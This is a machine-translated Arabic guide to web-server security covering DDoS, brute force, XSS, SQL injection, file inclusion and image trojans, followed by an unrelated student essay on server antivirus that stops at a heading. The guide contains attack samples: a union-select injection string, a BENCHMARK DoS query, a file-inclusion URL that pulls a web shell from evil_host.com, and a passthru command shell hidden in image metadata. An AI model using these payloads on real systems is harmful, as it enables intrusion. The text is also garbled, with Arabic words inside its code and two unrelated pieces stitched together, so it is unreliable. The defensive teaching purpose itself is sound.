  • قم بتعيين حصص الموارد للحساب الذي يتم تشغيل هذا البرنامج بموجبه. * تسمح لك أنظمة nix بضبط النسبة المئوية لاستخدام وحدة المعالجة المركزية وذاكرة الوصول العشوائي وعدد العمليات التي تم إنتاجها والملفات المفتوحة وما إلى ذلك. إلخ.
  • قم بإعداد تسجيل الدخول في البرنامج وحاول العثور على محرك المهاجم وحظره في جدار الحماية.
  • قم بإعداد البرنامج وفقًا لما نصح به المطور ، المعلم ، وفقًا لمقالات على الإنترنت ، إذا وجدت نفسك في مثل هذا الموقف.
• DDoS (نفس DoS ، لكنك تتعرض للهجوم من عدة أجهزة كمبيوتر زومبي ، بقيادة
  مهاجم). DDoS مدمر ولا يستخدمه إلا المخربون الذين لديهم قطعان من آلات الزومبي وسيطلبون المال لإيقاف الهجوم أو إتلاف عملك حتى يتمكن المستخدمون ، دون الوصول إلى الخادم الخاص بك ، من الذهاب إلى منافس. لا يتم استخدام هجمات DDoS من قبل المتسللين الذين يهدفون إلى اختراق خادمك ذهنيًا ، نعم ، نعم ، يعد خادمك "لغزًا" يريدون "حله".

  كيف تحمي نفسك من DDoS؟ إذا كنت تعتمد على نقاط القوة والوسائل الخاصة بك ، فعند أتمتة عمل البرامج النصية ، يمكنك صيد عناوين IP من سجلات مختلفة وإدخالها في قواعد جدار الحماية المحظورة. لذلك ، على سبيل المثال ، هل كاتب مقال "هل هناك حياة تحت DDoS؟" في مجلة Hacker. حظر شبكات المهاجمين في جدار الحماية ، ويمكن تقليل ضرر DDoS إذا قرأت مقالات حول تكوين برامجك واتبعت هذه التعليمات. العديد من المقالات حول كيفية تكوينه لتقليل ضرر DDoS.

  الحماية ضد هجمات DDoS:

  • إذا تم توجيه DDoS إلى التطبيق ، فحاول العثور في السجلات على الاختلافات بين المهاجمين والمستخدمين الشرعيين ، ومن خلال التشغيل الآلي باستخدام برنامج نصي ، أدخله في قواعد جدار الحماية في حالة الرفض
  • إذا تم توجيه DDoS إلى النظام (على سبيل المثال ، هجوم على بروتوكول ICMP) ، فمن خلال التشغيل التلقائي مع برنامج نصي ، قم بإضافته إلى قواعد جدار الحماية في حالة الرفض
  • قم بتعيين حصص الموارد للحساب الذي يتم تشغيل هذا البرنامج بموجبه. * تسمح لك أنظمة nix بتكوين النسبة المئوية لاستخدام وحدة المعالجة المركزية ، وذاكرة الوصول العشوائي ، وعدد العمليات التي تم إنتاجها ، والملفات المفتوحة ، وما إلى ذلك.
  • قم بإعداد البرنامج وفقًا لما نصح به المطور ، المعلم ، وفقًا لمقالات على الإنترنت ، إذا وجدت نفسك في مثل هذا الموقف
  • اتصل بمزود المنبع للمساعدة بأي طريقة ممكنة. اكتب شكوى إلى [بريد إلكتروني محمي] host_of_networks_from_attack.domain. سيساعد هذا في تدمير شبكة المهاجم جزئيًا ، والسماح له بالتلف ، ويكلفه المال. تجربة الرضا المعنوي.
  • تحقق من mod_security لـ Apache ، إنها أداة رائعة لمساعدتك في بعض المواقف.
• هجوم كلمة المرور Bruteforce. هنا لا يمكن إلقاء اللوم على الثغرات الموجودة في البرامج ، فهم يختارون تقريبًا زوجًا من تسجيل الدخول / كلمة المرور. أولئك الذين غادروا الخادم مع تكوين ssh ، لكنهم نسوا تقييد الوصول عبر ssh من عناوين IP معينة ومع بعض عمليات تسجيل الدخول (التوجيه في ssh_config AllowUser) ، يجب أن يكونوا قد رأوا في السجلات محاولات لفرض كلمة مرور الهريس: mash_password.

  حماية كلمة المرور Bruteforce:

  • الحد من عدد محاولات تسجيل الدخول / كلمة المرور غير الناجحة
  • إذا كان التطبيق يسمح بذلك ، فقم بإعداد زيادة في الوقت قبل محاولة تسجيل الدخول / كلمة المرور الجديدة.
  • إذا كان يجب على دائرة ضيقة من الأشخاص العمل مع التطبيق ، فقم بإنشاء مثل هذه القاعدة وقصرها على

هجوم من خلال المحتوى الديناميكي للخدمة

غالبًا ما يحدث هذا النوع من الهجوم على مجموعة من Apache + (PHP | PERL) + (MySQL | PostgreSQL) لعالم * nix و IIS + ASP + Microsoft SQL Server لعالم MS Windows باستخدام متصفح بسيط ، ولكن هذا فقط حالة خاصة ، والتي يتم استخدامها كثيرًا نظرًا لشعبية الويب. في هذه الحزمة ، لغات البرمجة هي ASP و PHP و Perl و SQL ، لذلك غالبًا ما يستخدمها المتسللون لتجميع تصميماتهم المدمرة.

لكن أهم شيء يجب فهمه هو أن مثل هذه الأربطة خدمة + محتوى ديناميكي فوقهايوجد الكثير في لغات البرمجة ، وبالتالي فإنهم جميعًا تحت سلاح المتسللين. على سبيل المثال ، فيما يلي قائمة غير كاملة:

• خادم الويب + البرامج النصية CGI
• رابط قديم لم يعد قيد الاستخدام - نصوص Apache + PHF (أي PHF)
• خادم تطبيق IIS + ColdFusion
• آلية SSI (يشمل جانب الخادم)

بعد ذلك ، سنتحدث في الغالب عن اختراق الويب ، لكن لا تنس أن كل ما هو موصوف أدناه صحيح بالنسبة للخدمة الأخرى + حزم المحتوى الديناميكي. الكلمات مختلفة ، لكن الجوهر هو نفسه. اليوم ، يهاجم المتسللون الويب بالمتصفح ، وغدًا مع عميل R ضد خدمة Z. أصبح خادم الويب ، المتصل بقواعد البيانات والعديد من لغات البرمجة ، منصة لهجمات من هذا النوع.

معنى جميع الهجمات من هذا النوع هو محاولة فحص الموقع باستخدام متصفح للعثور على أخطاء في البرامج النصية التي تخدم المحتوى الديناميكي (المحتوى) للموقع.

ومن هنا الاستنتاج - اختراق موقع من خلال هجوم على الويب ، حيث توجد صفحات html ثابتة فقط تشير إلى بعضها البعض ، أمر مستحيل. حدثت الهجمات من خلال موقع الويب الخاص بك عندما أراد الناس مزيدًا من التفاعل وقاموا بإضافتها من خلال لغات البرمجة وقواعد البيانات.

يولي المتسللون الذين يتصفحون الموقع اهتمامًا خاصًا للنصوص التي تم تمريرها إلى أي معلمة. ولكن ماذا لو لم يتحقق كاتب النص البرمجي بالضبط من ما تم تمريره كقيمة المعلمة؟

حلول عامة للمشرف من الهجمات على المحتوى الديناميكي للخدمة (موقع الويب كحالة خاصة)

• تحديث. لقد تحدثنا بالفعل عن هذا ، ولكن إذا كنت تستخدم تطورات جهات خارجية (محركات المنتديات ، والمعارض ، والمحادثات ، وما إلى ذلك) ، فستتلقى تقارير عن نقاط الضعف وثغرات التصحيح. ويرى المتسللون أنه إذا كانت البوابة تعمل مع الموارد المالية ودورانها ، فليس من المرغوب فيه أن يكون لمثل هذه البوابة تطورات خاصة بشخص آخر ، باستثناء تلك الخاصة بهم. بالطبع ، من المفهوم أن تطوير محركاتهم الخاصة للموقع تمت كتابته بواسطة المبرمجين الذين يعرفون كيفية البرمجة بأمان ولديهم فهم للتهديدات على الإنترنت.
• كن غير قياسي. في العديد من أدوات القراصنة ، غالبًا ما تومض قواعد بيانات الثغرات الأمنية والمنتدى / معرض الصور / المسارات. مريح جدا! تعرف على المسؤول ، فإن نصفهم سيحلقون ويبصقون على موقعك عندما لا يكون موقعك موجودًا على / usr / www ، ومسؤولك ليس site.com/admin. خلاصة القول ، إذا لم تكن قياسيًا ، فهذا حديث إضافي في عجلات المتسلل الذي يهاجم موقعك. سيتعين عليه إضافة / تصحيح في قاعدة البيانات / البرنامج النصي اليدوي. ولكن هل المخترق قادر دائمًا على القيام بذلك أو يرغب في القيام بذلك؟ سيكون القراصنة الصغار "أطفال البرامج النصية" خائفين بالتأكيد. على سبيل المثال ، نصائح أمان PHP

  # اجعل كود PHP يشبه الأنواع الأخرى من الأكواد
  تطبيق AddType / x-httpd-php .asp .py .pl
  # اجعل كود PHP يبدو وكأنه أكواد غير معروفة
  تطبيق AddType / x-httpd-php .bop .foo .133t
  # اجعل كود PHP يبدو مثل html
  تطبيق AddType / x-httpd-php .html .htm
  

  هذا الشكل من الحماية لـ PHP من خلال الاختباء له عيوب قليلة بتكلفة قليلة. يكتب المتسللون أنفسهم ، الذين يصفون الاختراقات الخاصة بهم ، أنهم يقومون بتنزيل نفس البرنامج الموجود على الخادم الخاص بك من موقع المطور وينظرون إلى أسماء / مسارات الجدول الافتراضية / هذا المحرك أو ذاك الذي يعمل معه. المعنى العام للغير قياسي هو تأخير عملية القرصنة بحيث لا يكون لدى المخترق "حرب خاطفة" ، وكلما زاد سحبه ، زادت احتمالية اكتشافه.

• قم بإزالة إصدارات المحركات والنصوص الموجودة على الموقع. هذه معلومات قيمة يجب حرمان المهاجم منها ، مع العلم بالنسخة التي يبحثون عنها عن حلول جاهزة للقرصنة. اجعلها بحيث لا تعرض البرامج النصية الخاصة بك أخطاء في الأخطاء معلومات مفيدة، مثل: المسار إلى البرنامج النصي حيث حدث الخطأ (مشكلة "الكشف عن المسار") ومخرجات الخطأ نفسه.
• ضع في اعتبارك الحاجة إلى .htaccess. يعني وجود ملفات .htaccess أنه يمكنك تجاوز الخيارات المحددة في تكوين Apache الرئيسي ، صدقوني ، سيفعل المتسللون ذلك بالضبط. إذا قمت بتعطيل استخدام .htaccess باستخدام التوجيه "AllowOverride None" ، فستحصل على ميزة أداء لـ Apache ، نظرًا لأنه لن يبحث في جميع الأدلة الموجودة على المسار إلى صفحة الويب عند كل طلب ويزيد من أمان خادم الويب Apache.

المزيد حول الهجمات على المحتوى الديناميكي (موقع الويب كحالة خاصة)

• XSS (البرمجة النصية عبر المواقع).
  تسمى البرمجة النصية عبر المواقع XSS ، وليس CSS ، نظرًا لأن CSS هي اختصار مبكر لـ "Cascading Style Sheets". لا يتم توجيه هجمات XSS ضد الخادم ، ولكن ضد مستخدمي ذلك الخادم. لكن المشرف لا يحتاج أن يفرح! يبدو هجوم XSS على هذا النحو ، يحتوي الموقع على حقول قابلة للتحرير على صفحة الويب أو معلمات البرنامج النصي التي لم تتم تصفيتها في بنيات النوع<, >، جافا سكريبت.

  يضيف المخترق كودًا بلغة البرمجة من جانب العميل ، عادةً Java و VBScript ، إلى الحقول القابلة للتحرير ، ويصبح هذا الرمز جزءًا من صفحة HTML. عندما يزور مستخدم مثل هذه الصفحة ، يقوم المتصفح بتحليل الصفحة وتنفيذ هذا الرمز.
  ماذا يفعل المتسللون باستخدام XSS؟

  • سرقة ملفات تعريف الارتباط (ملفات تعريف الارتباط ، الكعك) - تخزن هذه الملفات النصية المعلومات التي "يضعها" الخادم للمستخدم لتحديد هويته لاحقًا. في المثال ، إذا أنشأت ملف test.html بهذا المحتوى (اكتبه بنفسك) ، فعند تشغيله في متصفح ، سينتج XSS.
    عزيزي المشرف حدث خطأ أثناء زيارة الموقع
    مساعدة

    ولكن يمكنك كتابة نص بلغة جافا وبشكل أكثر جدية. عادةً ما تتم كتابة هذه البرامج النصية على بريد الويب الخاص بالمسؤول ، وباستخدام الهندسة الاجتماعية ، حاول إقناعه بقراءة الرسالة للحصول على ملفات تعريف الارتباط الخاصة به.

    إذا لم يكن هناك رابط بعنوان IP وتدابير أمان إضافية في ملفات تعريف الارتباط ، فإنهم يستبدلون ملفات تعريف الارتباط الخاصة بهم بملفات تعريف ارتباط المسؤول ويحاولون الدخول إلى لوحة الإدارة ، التي لا تتحقق من تسجيل الدخول وكلمة المرور ولا تحدد الأشخاص إلا عن طريق ملفات تعريف الارتباط.

  • تشويه الموقع (تشويه - استبدال الصفحة الرئيسية للموقع ، غالبًا index.html)
  • طروادة مستخدم بعيد. يتم تحديد عمليات الاختراق الجديدة لمتصفحات المستخدمين وعندما يدخلون إلى صفحة معرضة للخطر ، يتم إجراء محاولة لإصابة الكمبيوتر بأحد أحصنة طروادة. إذا كان لدى المستخدم برنامج مكافحة فيروسات مثبت عليه قواعد بيانات حديثة ، فسيشير إلى ظهور حصان طروادة في النظام. وسوف يقع موقعك في عيون المستخدم ، فربما لن يأتيك مرة أخرى.
  • DoS. مع وجود عدد كبير من الزوار ، سيطلب البرنامج النصي بالإضافة إلى ذلك المزيد من الصفحات الأخرى من الخادم الخاص بك أو من خادم آخر ، قد يكون لدى شخص ما DoS.

  المحلول:

  • لمنع كتابة علامات html إلى قاعدة البيانات من حقول الإدخال ، استخدم تركيبات مثل htmlspecialchars لـ PHP ، والتي ستحل محل< на <, >إلى> و إلى & وما إلى ذلك
    مثال،

    تعليق $ = htmlspecialchars (تعليق $، ENT_QUOTES)؛
    استعلام $ = "إدراج في سجل الزوار
    (الاسم ، الموقع ، البريد الإلكتروني ، url ، التعليق) القيم
    ("$ name"، "$ location"، "$ email"، "$ url"، "$ comment") "؛
    mysql_query ($ query) أو die (mysql_error ()) ؛

  • تحقق من نصوصك وقم بتصفية جميع المعلمات التي يدخلها المستخدم ويتم تمريرها إلى البرنامج النصي من خلال شريط العناوين. تعرف على كيفية استخدام التعبيرات العادية بشكل صحيح لتحليل البيانات الواردة. بالنسبة للغة البرمجة الخاصة بك ، ابحث عن مادة تعلمك كيفية البرمجة بأمان.
  • إذا كنت ترغب في استخدام تقنية ملفات تعريف الارتباط على موقعك ، فيرجى قراءة ممارسات أمان ملفات تعريف الارتباط الخاصة بنا. الحد من أفعالهم في الوقت المناسب وعناوين IP.
  • بصفتك مشرفًا ، كن يقظًا عندما تتعرض للخداع من خلال الهندسة الاجتماعية. لا تنس أمان الكمبيوتر الشخصي خلف جهاز الكمبيوتر العميل.
• حقن SQL. حقن SQL.
  يعني هذا المرض أنه يتم استبدال معلمة غير محددة في استعلام SQL الذي يظهر في البرنامج النصي. يعثر المخترق على نصوص برمجية تعاني من حقن SQL بطريقة بسيطة ، حيث يتم توفير الاقتباس site.com/view.php؟id=1 "لقيمة المعلمة ، أو يتم تعديل المعلمة الرقمية مثل this site.com/view.php؟ المعرف = 2-1.

  إذا تسبب الاقتباس البديل في حدوث "خطأ" (مجموعة من الرسائل التي لم يتم تنفيذ مثل هذا الطلب في نص كذا وكذا على طول هذا المسار) ، فإن مثل هذا البرنامج النصي هو مرشح لضخه بشكل أكبر. في كثير من الأحيان ، يستخدم المهاجمون اختراق Google ، ويسألون محرك البحث شيئًا مثل هذا "site: www.victim.ru Warning". سيعيد محرك بحث Google نصوصًا غير صحيحة على موقعك ، قديمة جدًا لدرجة أنه تم فهرستها منذ فترة طويلة بواسطة عنكبوت Google .

  رمز لا يتحقق من القيمة ويعاني من إدخال SQL

  $ id = $ _REQUEST ["id"] ؛
  $ result = mysql_query ("SELECT title، text، datenews، المؤلف من` news` WHERE `id` =" $ id "")؛
  

  تخيل الآن أنه بدلاً من الرقم ، سيتم استبدال "-1 union select null / *" (بدون علامات اقتباس) ثم يتحول استفسارك إلى

  حدد العنوان والنص وأخبار التاريخ والمؤلف من `الأخبار` حيث` id` = "- نقابة واحدة حدد خالية / *"
  

  أي أن المخترق يريد تنفيذ طلبه بالإضافة إلى طلبك ، جنبًا إلى جنب مع طلبك باستخدام توجيه الاتحاد. وبعد ذلك سيحاول المخترق إجراء استفسارات أخرى ، وبالنظر إلى قوة لغة SQL ، فإن هذا لا يبشر بالخير للمسؤول. من تشويه (تشويه - استبدال صفحة البداية للموقع) للحصول على حقوق الجذر على الخادم الخاص بك. يمكن للمتسلل أيضًا تنفيذ هجوم DoS بفضل حقن SQL: site.com/getnews.php؟id=BENCHMARK(10000000،BENCHMARK(10000000، md5 (current_date))) زوجان من هذه الطلبات والخادم في وحدة المعالجة المركزية بنسبة 100٪ تحميل لفترة طويلة.

  حماية حقن SQL:

  • استخدم ميزات SQL Server على نطاق واسع مثل طرق العرض والإجراءات المخزنة. سيؤدي ذلك إلى تقييد الوصول غير المصرح به إلى قاعدة البيانات.
  • قبل تمرير معلمة إلى الطلب ، يجب التحقق من النوع (لـ PHP - is_bool () ، is_float () ، is_int () ، is_string () ، is_object () ، is_array () و is_integer ()) وعلى الأقل ، مقتبس باستخدام بناء نوع الشرطات المائلة للغة PHP.
  • تعمل كافة البرامج النصية مع قاعدة البيانات من بعض حسابات قاعدة البيانات ، قم بإزالة كافة الامتيازات من هذا الحساب غير الضرورية للعمل. غالبًا ما يستخدم المتسللون أمر MySQL (يتم أخذ MySQL كمثال ، وهذا ينطبق على أي خادم SQL) "LOAD DATA INFILE" لقراءة الملفات التي يحتاجونها من الخادم والحساب المقروء الذي تعمل MySQL تحته. ومن هنا جاءت النتيجة ، قم بتعطيل الامتيازات غير الضرورية للنصوص الخاصة بك ، مثل FILE ، اللازمة لاستخدام أمر LOAD DATA INFILE. يجب أن يؤخذ مبدأ "الحد الأدنى الأساسي" كأساس.
  • يجب ألا يكون لحساب النظام الذي يعمل بموجبه خادم SQL حق الوصول إلى صفحات الموقع وملفات النظام الخاصة بالخادم.
• ربط الملفات. تضمين الملف. لنفترض أن هناك صفحة site.com/getnews.php؟file=190607 ، لكن مؤلف البرنامج النصي ، باستخدام التضمين ، يربط الصفحة دون تحديد.

  ملف $ = $ _REQUEST ["ملف"] ؛
  تشمل (ملف $. ". html") ؛
  

  سيحل المخترق محل evil_host.com/shell.php بدلاً من 190607 ثم سيبدو شريط العنوان بالكامل لمتصفح المخترق مثل هذا site.com/postnews.php؟file=evil_host.com/shell.php وسيحصل المخترق على قذيفة الويب الخاصة به على موقعك مع الحقوق التي يتمتع بها Apache.

  حماية اتصال الملفات:

  • تحقق من نصوصك وقم بتصفية جميع المعلمات التي يدخلها المستخدم ويتم تمريرها إلى البرنامج النصي من خلال شريط العناوين. بالنسبة للغة البرمجة الخاصة بك ، ابحث عن مادة تعلمك كيفية البرمجة بأمان.
  • يحب المتسللون حقًا عندما تسمح لك لغة البرمجة على الموقع بتشغيل أوامر النظام. لذلك ، تحتاج إلى حظر استدعاء مثل هذه الوظائف بلغة البرمجة الخاصة بك ، إذا كان ذلك ممكنًا بالطبع. على سبيل المثال ، في إعدادات PHP ، من الممكن تحديد قائمة الوظائف "المحظورة" باستخدام disable_functions في php.ini.
• صورة طروادة
  إذا كان لديك القدرة على تحميل الملفات إلى الخادم على الموقع ، فاستعد لتحميل الصور الرمزية على سبيل المثال. في صورة بتنسيق JPEG ، يوجد مفهوم البيانات الوصفية (تذكر المكان الذي تكتب فيه الكاميرا المعلومات عند تصوير إطار) وستتم كتابة هذه البيانات الوصفية

  "؛ passthru ($ _ GET [" cmd "]) ؛ صدى""; ?>
  

  ستتم إعادة تسمية الصورة باسم avatara.jpg.php لتجاوز معظم فحوصات الامتداد وستستخدم site.com/upload_images/avatara.jpg.php؟cmd=server_commands

  حماية طروادة:

  • تحقق من امتداد الملف بشكل صحيح. حتى إذا قمت بمعالجة الملفات المسموح بها بشكل صحيح ، فاستعد لإعادة تسمية الصورة من jpg إلى php باستخدام ثغرة أمنية أخرى على موقعك. تحقق من البيانات الوصفية في صورة بوظائف مثل exif_read_data () في PHP.
  • منع تنفيذ لغات البرمجة في أدلة الصور عن طريق خادم الويب الخاص بك. للقيام بذلك ، ابحث في سطور تكوين Apache مثل "تطبيق AddType / x-httpd-" ، الذي يربط لغات البرمجة بامتدادات الملفات ويمنع تنفيذها في الدلائل بالصور. بالنسبة إلى Apache ، سيكون حظر تنفيذ ملفات لغة PHP بمثابة بناء

    
    أمر رفض ، اسمح
    رفض من الجميع
    

  • بالنسبة للغة البرمجة الخاصة بك ، ابحث عن مادة تعلمك كيفية البرمجة بأمان عند معالجة الصور وتحميلها بشكل صحيح على الخادم.

شكر شخصي:

• صديق الكسندر Pupyshev الملقب الوشق للنقد والمشورة
• موقع antichat.ru/
• www.xakep.ru/
• كتاب مايكل إبين ، بريان تايمان. إدارة FreeBSD: فن التوازن
• كتاب جويل سكامبراي وستيوارت مكلور وجورج كورتز. أسرار المتسللين: أمن الشبكات - حلول جاهزة. الطبعة الثانية

مصادر أخرى لمعلومات الحماية:

• تحتوي صفحة دليل أمان رجل FreeBSD على وصف لمشكلات الأمان الشائعة وممارسات الإدارة الجيدة.
• اشترك في القوائم البريدية freebsd-security @ freebsd.org. للقيام بذلك ، أرسل بريدًا إلكترونيًا إلى majordomo @ freebsd.org مع اشتراك freebsd-security في نص الرسالة. تتم مناقشة أكثر قضايا الأمان إلحاحًا في هذه القائمة البريدية.
• صفحة معلومات أمان FreeBSD freebsd.org/security/
• وثيقة FreeBSD Security How-To
• يحتوي موقع CERT.org على معلومات حول نقاط الضعف في حماية جميع أنظمة التشغيل.
• جدران الحماية وأمن الإنترنت بواسطة William R. Cheswick و Steven M. Bellowin
• بناء جدران حماية الإنترنت ، الإصدار الثاني من تأليف برنت تشابمان وإليزابيث زويكي

حصيلة:
آمل أن تكون المقالة قد ساعدتك في رؤية جميع المشكلات معًا ، والآن يحتاج المسؤول إلى القراءة عن أمان الكمبيوتر وقواعد البيانات وخوادم الويب ولغات البرمجة من مصادر إضافية. تلخيصًا موجزًا ​​للمقال ، يجب أن تكون على دراية بالأخبار المتعلقة بإصدار مشكلات الأمان ، وتحديث جميع بيانات الإدخال والتحقق منها للتأكد من صحتها في تطوراتك.
قد تكون القوة معك!

جامعة ولاية شيتا معهد الطاقةكلية الاقتصاد والمعلوماتية قسم المعلوماتية التطبيقية والرياضيات الملخص حول الموضوع: مستخدم الكمبيوتر الشخصي حول الموضوع: برنامج مكافحة الفيروسات للخوادم مكتمل: الفن. غرام. PI-07-1 تم الفحص: فن. مدرس كافيه Pimmonic I.P. تشيتا ، 2007 المحتوى

مقدمة. 3

1 خوادم الملفات كأحد مصادر توزيع الفيروسات. 5

2 برنامج مكافحة الفيروسات لخوادم الشبكة المحلية. 5

3 برامج مكافحة الفيروسات لخوادم البريد. ثمانية

4 كاسبيرسكي المضاد للفيروسات. أحد عشر

خاتمة. 17

قائمة المراجع .. 18

مقدمةتعد فيروسات الكمبيوتر من أخطر التهديدات لأمن المعلومات اليوم. فيروس الكمبيوتر هو برنامج مكتوب بشكل خاص يمكنه ربط نفسه تلقائيًا ببرامج أخرى وإنشاء نسخ منه وحقنها في الملفات ومناطق أنظمة الكمبيوتر وشبكات الكمبيوتر لتعطيل البرامج والملفات والأدلة الفاسدة وإنشاء جميع أنواع التداخل في العمل على الكمبيوتر.

يُفهم أمن المعلومات على أنه حماية المعلومات والبنية التحتية الداعمة لها من أي تأثيرات عرضية أو ضارة ، والتي قد تؤدي إلى تلف المعلومات نفسها أو أصحابها أو البنية التحتية الداعمة. يتم تقليل مهام أمن المعلومات لتقليل الضرر ، وكذلك للتنبؤ ومنع مثل هذه الآثار.

بالنسبة لمعظم المؤسسات ، أصبحت حماية موارد الشبكة من الوصول غير المصرح به إحدى أكثر المشكلات إلحاحًا. ومما يثير القلق بشكل خاص حقيقة أن الإنترنت تستخدم الآن على نطاق واسع لنقل وتخزين مختلف البيانات والمعلومات السرية للشركات.

مهمة حماية المعلومات مهمة بشكل خاص لأصحاب قواعد بيانات المعلومات على الإنترنت وناشري المجلات الإلكترونية ، إلخ.

حتى الآن ، تم إنشاء العديد من برامج مكافحة الفيروسات لمحاربة الفيروسات. يعد برنامج مكافحة الفيروسات (مضاد الفيروسات) في الأصل برنامجًا لاكتشاف ومعالجة البرامج المصابة بفيروس الكمبيوتر ، وكذلك لمنع إصابة ملف بواسطة فيروس (على سبيل المثال ، عن طريق التطعيم). تسمح لك العديد من برامج مكافحة الفيروسات الحديثة باكتشاف وإزالة أحصنة طروادة والبرامج الضارة الأخرى. تتكون برامج مكافحة الفيروسات من برامج الكمبيوتر التي تحاول اكتشاف ومنع وإزالة فيروسات الكمبيوتر والبرامج الضارة الأخرى. تساعد برامج مكافحة الفيروسات على حماية جهاز الكمبيوتر الخاص بك من الفيروسات المعروفة والديدان وأحصنة طروادة والبرامج الضارة الأخرى التي يمكن أن تتعطل أثناء تشغيل الكمبيوتر. حاليًا ، تعد خوادم الملفات والبريد هي الأداة الرئيسية لإدارة البيانات. يعد تخزين البيانات وتبادلها ونقلها من المهام الرئيسية في مثل هذه الإدارة ، ولكنها مستحيلة دون سهولة الوصول إلى المعلومات وتكامل البيانات واستقرار النظام. خادم الملفات هو أحد موارد الشبكة الأكثر عرضة للخطر. في حالة حدوث إصابة أو عطل ، قد يتم تقييد الوصول إلى موارد الشبكة الأخرى. يمكن أن يؤدي ملف مصاب واحد إلى إصابة كمية كبيرة من البيانات وفقدان تكامل البيانات وفشل النظام. تؤدي هذه المخاطر إلى ارتفاع تكلفة منتجات إدارة موارد الشبكة والخادم. تعد خوادم الملفات "العامة" والمؤتمرات الإلكترونية من المصادر الرئيسية لتوزيع الفيروسات. في كل أسبوع تقريبًا ، هناك رسالة تفيد بأن بعض المستخدمين قد أصاب جهاز الكمبيوتر الخاص به بفيروس مأخوذ من خادم BBS أو خادم ftp أو من مؤتمر إلكتروني ما. في هذه الحالة ، غالبًا ما "يضع" مؤلف الفيروس الملفات المصابة على العديد من BBS / ftp أو يتم إرسالها إلى عدة مؤتمرات في نفس الوقت ، ويتم إخفاء هذه الملفات كإصدارات جديدة لبعض البرامج (أحيانًا - ضمن إصدارات جديدة من برامج مكافحة الفيروسات ). في حالة التوزيع الشامل للفيروس على خوادم ملفات ftp / BBS ، يمكن أن تتأثر آلاف أجهزة الكمبيوتر بشكل متزامن تقريبًا ، ولكن في معظم الحالات يتم "وضع" فيروسات DOS أو Windows ، ويكون معدل انتشارها في الظروف الحديثة أقل بكثير من فيروسات الماكرو. لهذا السبب ، فإن مثل هذه الحوادث لا تنتهي أبدًا تقريبًا بأوبئة جماعية ، وهو ما لا يمكن قوله عن فيروسات الماكرو. 2 برنامج مكافحة الفيروسات لخوادم الشبكة المحليةأصبحت قضايا الحماية الفعالة من الفيروسات موضوعية اليوم أكثر من أي وقت مضى سواء في قطاع الشركات أو بين المستخدمين الخاصين ، ومع ذلك ، على عكس الأخير ، فإن المشاكل والمهام التي تواجه الشركات أكثر خطورة وتتطلب حلولًا من مستوى مختلف. يجب على مسؤولي نظام معلومات الشركة تثبيت أدوات مكافحة الفيروسات وتهيئتها وإعداد سياسات التحديث والتأكد من تمكين برامج مكافحة الفيروسات باستمرار على مئات أو حتى آلاف الأجهزة - وغالبًا ما يجب القيام بذلك يدويًا. الشبكات المحلية هي أحد المصادر الرئيسية لتوزيع الفيروسات. إذا لم تتخذ إجراءات الحماية اللازمة ، فإن محطة العمل المصابة ، عند دخولها إلى الشبكة ، تصيب ملف خدمة أو أكثر على الخادم (في حالة Novell NetWare - LOGIN.COM). في اليوم التالي ، يقوم المستخدمون بتشغيل الملفات المصابة عند تسجيل الدخول إلى الشبكة. بدلاً من ملف خدمة LOGIN.COM ، يمكن أيضًا تشغيل العديد من البرامج المثبتة على الخادم أو مستندات القوالب القياسية أو جداول بيانات Excel المستخدمة في الشركة.

يعتبر خطر إصابة شبكات الكمبيوتر خطرًا حقيقيًا لأي مؤسسة ، ولكن يمكن أن يتطور وباء الفيروس حقًا في الشبكات المحلية للمجمعات الاقتصادية والصناعية الكبيرة ذات البنية التحتية المتفرعة إقليمياً. تم إنشاء شبكات الكمبيوتر الخاصة بهم ، كقاعدة عامة ، على مراحل ، باستخدام أجهزة وبرامج مختلفة. من الواضح ، بالنسبة لمثل هذه المؤسسات ، أن مسألة الحماية من الفيروسات تصبح صعبة للغاية ، ليس فقط من الناحية الفنية ، ولكن أيضًا من الناحية المالية.

في الوقت نفسه ، يتم حل هذه المشكلة من خلال مجموعة من الإجراءات التنظيمية وحلول البرامج والأجهزة. لا يتطلب هذا الأسلوب تكاليف مالية تقنية وفورية كبيرة ، ويمكن استخدامه للحماية الشاملة ضد الفيروسات للشبكة المحلية لأي مؤسسة.

يمكن أن تكون المبادئ التالية بمثابة الأساس لبناء مثل هذا النظام للحماية من الفيروسات:

مبدأ تنفيذ سياسة فنية موحدة عند تبرير اختيار المنتجات المضادة للفيروسات لمختلف قطاعات الشبكة المحلية ؛

مبدأ التغطية الكاملة للشبكة المحلية الكاملة للمنظمة من خلال نظام الحماية من الفيروسات ؛

مبدأ استمرارية التحكم في الشبكة المحلية للمؤسسة للكشف عن إصابات الكمبيوتر في الوقت المناسب ؛

مبدأ الإدارة المركزية للحماية من الفيروسات ؛

ينص مبدأ تنفيذ سياسة فنية موحدة على الاستخدام في جميع أجزاء الشبكة المحلية فقط لبرامج مكافحة الفيروسات الموصى بها من قبل قسم الحماية من الفيروسات في المؤسسة. هذه السياسة طويلة الأجل ، ومعتمدة من قبل إدارة المؤسسة وهي الأساس للتخطيط المستهدف والطويل الأجل لتكاليف شراء منتجات برامج مكافحة الفيروسات وتحديثها الإضافي.

ينص مبدأ التغطية الكاملة للشبكة المحلية من خلال نظام الحماية من الفيروسات على الإدخال التدريجي لبرامج الحماية من الفيروسات في الشبكة حتى تصبح مشبعة تمامًا ، بالاقتران مع إجراءات حماية المعلومات التنظيمية والنظامية.

يشير مبدأ التحكم المستمر في حالة مكافحة الفيروسات لشبكة محلية إلى مثل هذا التنظيم لحمايتها ، مما يوفر إمكانية ثابتة لمراقبة حالة الشبكة لاكتشاف الفيروسات.

يوفر مبدأ الإدارة المركزية للحماية من الفيروسات إدارة النظام من هيئة واحدة باستخدام الأجهزة والبرامج. هذه الهيئة هي التي تنظم التحكم المركزي في الشبكة ، وتتلقى بيانات التحكم أو التقارير من المستخدمين من أماكن العمل الخاصة بهم بشأن اكتشاف الفيروسات ، وتضمن تنفيذ القرارات المتخذة لإدارة نظام الحماية من الفيروسات. تعد الشبكة المحلية لمؤسسة كبيرة مشكلة معقدة لا يمكن اختزالها في عملية تثبيت بسيطة لمنتجات مكافحة الفيروسات. كقاعدة عامة ، يلزم إنشاء نظام فرعي منفصل. من الناحية الفنية ، عند حل هذه المشكلة ، ينبغي إيلاء اهتمام خاص لاختبار جميع برامج مكافحة الفيروسات المشتراة حديثًا ، وكذلك تثبيت حزم مكافحة الفيروسات على خوادم البريد. 3 برامج مكافحة الفيروسات لخوادم البريد

